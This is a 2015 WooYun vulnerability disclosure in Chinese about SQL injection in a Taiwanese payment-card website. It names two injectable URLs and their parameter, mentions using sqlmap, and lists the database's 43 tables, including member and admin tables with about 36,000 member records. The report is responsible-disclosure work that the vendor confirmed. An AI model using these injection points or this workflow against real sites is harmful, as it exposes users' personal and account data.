当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138215

漏洞标题:台湾某金融卡支付网站几处注入(泄露近4万会员信息)

相关厂商:台湾某金融卡支付网站

漏洞作者: 路人甲

提交时间:2015-08-31 20:33

修复时间:2015-10-16 12:00

公开时间:2015-10-16 12:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 细节已通知厂商并且等待厂商处理中
2015-09-01: 厂商已经确认,细节仅向厂商公开
2015-09-11: 细节向核心白帽子及相关领域专家公开
2015-09-21: 细节向普通白帽子公开
2015-10-01: 细节向实习白帽子公开
2015-10-16: 细节向公众公开

简要描述:

联合查询

详细说明:

注入点:
http://www.smart2pay.com.tw/qa.php?no=5
http://www.smart2pay.com.tw/events_detail.php?no=255
参数:no
网站开了gpc,但注入点为int型

1.png


放到sqlmap中

2.png


Database: DBL01356
[43 tables]
+---------------------+
| ActivityBanner |
| ActivityContent |
| ActivityMethod |
| PreferentialBanner |
| PreferentialClass |
| QA |
| SP_HomeMiddle |
| SP_HomeTop |
| SP_InnerTop |
| SpecialReport |
| adbanner |
| admin |
| auth |
| banner |
| cardbank |
| cardbankdescript |
| contact |
| contactus |
| country |
| ecstore |
| epaper |
| epapersent |
| film |
| life |
| mainmenu |
| mcc |
| member |
| member_bak |
| member_temp |
| preferentialContent |
| qaclass |
| repliedmail |
| reward |
| searchfn |
| secondmenu |
| state |
| storecategory |
| storeinfoContent |
| storeinfobanner |
| storeinfoclass |
| storelist |
| storelist2 |
| taiwan |
+---------------------+


会员数,36000+

3.png

漏洞证明:

可dump,仅作为证明

4.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-09-01 11:58

厂商回复:

感謝通知!

最新状态:

暂无